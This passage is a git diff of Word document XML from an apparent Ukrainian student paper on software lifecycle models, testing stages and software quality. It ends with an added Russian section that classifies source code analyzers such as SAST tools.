+        <w:t>розробка програмного коду - виконується перетворення алгоритмів, визначених на етапі деталізований проектування, в готове ПО;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>модульне тестування - виконуєт</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ься перевірка кожного </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>закодуваного</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> модуля на наявність помилок;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">інтеграція і тестування - установка взаємозв'язків між групами раніше </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>поелементно</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> випробуваних модулів з метою підтвердження того, що ці групи працюють та</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>к само</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> добре, як і модулі, випробувані незалежно один від одного на етапі </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>поелементного</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> тестування;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">системне і приймальне тестування - виконується перевірка функціонування програмної системи в цілому (повністю інтегрована система), після приміщенні в її апаратне середовище відповідно до </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>спеціфікацией</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> вимог до ПО.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>виробництво, експлуатація та супровід - ПО запускається у виробництво. На цій фазі передбачені також модернізації та внесення поправок;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>приймальні вип</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>робування (на рис. Не показані) - дозволяє користувачеві протестувати функціональні можливості системи на відповідність вихідним вимогам. Після остаточного тестування ПО і довколишній апаратне забезпечення стають робочими. Після цього забезпечується супровід системи.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -9014,8 +9438,6 @@
         </w:rPr>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -9698,6 +10120,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>відповідно</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -10466,7 +10889,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -11877,7 +12299,17 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">язана з характеристиками ПЗ самого по собі, без урахування його поведінки, зовнішньої якості, що характеризує ПЗ з точки зору його поведінки, та якості ПЗ при використанні в різних умовах – та якість, яку відчуває користувач за конкретних сценаріїв роботи ПЗ. Для всіх цих поглядів на якість було введено метрики, які дозволяють оцінити його. Також при розробці якісного ПЗ важливою є якість технологічних процесів його розробки. Відношення між цими складовими якості по схемі, прийнятій в </w:t>
+        <w:t xml:space="preserve">язана з характеристиками ПЗ самого по собі, без урахування його поведінки, зовнішньої якості, що характеризує ПЗ з точки зору його </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">поведінки, та якості ПЗ при використанні в різних умовах – та якість, яку відчуває користувач за конкретних сценаріїв роботи ПЗ. Для всіх цих поглядів на якість було введено метрики, які дозволяють оцінити його. Також при розробці якісного ПЗ важливою є якість технологічних процесів його розробки. Відношення між цими складовими якості по схемі, прийнятій в </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11924,7 +12356,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69A4368A" wp14:editId="5BCD4584">
             <wp:extent cx="5000625" cy="2089414"/>
@@ -12115,6 +12546,7 @@
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E4EA28B" wp14:editId="49BE5E60">
             <wp:extent cx="3514725" cy="3232140"/>
@@ -13248,6 +13680,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -14706,7 +15139,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Зрозумілість</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -15857,6 +16289,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>цього</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -17764,7 +18197,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Зручність</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -18701,6 +19133,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Зручність</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -19650,6 +20083,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2">
+    <w:nsid w:val="54BF63B5"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="04190021"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3">
     <w:nsid w:val="599D32D5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A888DA66"/>
@@ -19762,7 +20308,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3">
+  <w:abstractNum w:abstractNumId="4">
     <w:nsid w:val="64277235"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="67102D8E"/>
@@ -19875,7 +20421,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4">
+  <w:abstractNum w:abstractNumId="5">
     <w:nsid w:val="7DDD64F0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="04190021"/>
@@ -19992,16 +20538,19 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="2"/>
+    <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="4">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="5">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="6">
+    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>

--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -633,7 +633,6 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
@@ -2884,7 +2883,15 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>ітектурою</w:t>
+        <w:t>ітектур</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>и</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -6572,7 +6579,26 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">V-образна модель </w:t>
+        <w:t>V-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>подібна</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> модель </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -9221,18 +9247,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>приймальні вип</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>робування (на рис. Не показані) - дозволяє користувачеві протестувати функціональні можливості системи на відповідність вихідним вимогам. Після остаточного тестування ПО і довколишній апаратне забезпечення стають робочими. Після цього забезпечується супровід системи.</w:t>
+        <w:t>приймальні випробування (на рис. Не показані) - дозволяє користувачеві протестувати функціональні можливості системи на відповідність вихідним вимогам. Після остаточного тестування ПО і довколишній апаратне забезпечення стають робочими. Після цього забезпечується супровід системи.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12068,6 +12083,7 @@
         <w:ind w:firstLine="708"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
@@ -12076,6 +12092,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
@@ -12086,6 +12103,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
@@ -12096,6 +12114,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
@@ -14171,18 +14190,17 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> до </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>частоті</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> до частот</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>и</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -19825,15 +19843,561 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="360"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Классификация анализаторов исходного кода</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Анализаторы исходного кода — класс программных продуктов, созданных для выявления и предотвращения эксплуатации программных ошибок в исходных кодах. Все продукты, направленные на анализ исходного кода, можно условно разделить на три типа: Первая группа включает в себя анализаторы кода веб-приложений и средства по предотвращению эксплуатац</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ии уя</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">звимостей веб-сайтов. Вторая группа — анализаторы встраиваемого кода, позволяющие обнаружить проблемные места в исходных текстах модулей, предназначенных для расширения функциональности корпоративных и производственных систем. К таким модулям относятся программы для линейки продуктов 1С, расширения CRM-систем, систем управления предприятием и систем SAP. Последняя группа предназначена для анализа исходного кода на различных языках программирования, не относящихся к бизнес-приложениям и веб-приложениям. Такие анализаторы предназначены для заказчиков и разработчиков программного обеспечения. В том числе данная группа анализаторов применяется для использования методологии защищенной разработки программных продуктов. Анализаторы статического кода находят проблемы и потенциально уязвимые места в исходных кодах и выдают рекомендации для их устранения. Стоит отметить, что большинство из анализаторов относятся к смешанным типам и выполняют функции по анализу широкого спектра программных продуктов — веб-приложений, встраиваемого кода и обычного программного обеспечения. Тем не </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>менее</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> в данном обзоре упор сделан на применение анализаторов заказчиками разработки, поэтому большее внимание уделяется анализаторам веб-приложений и встраиваемого кода. Анализаторы могут содержать различные механизмы анализа, но наиболее распространенным и универсальным является статический анализ исходного кода — SAST (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
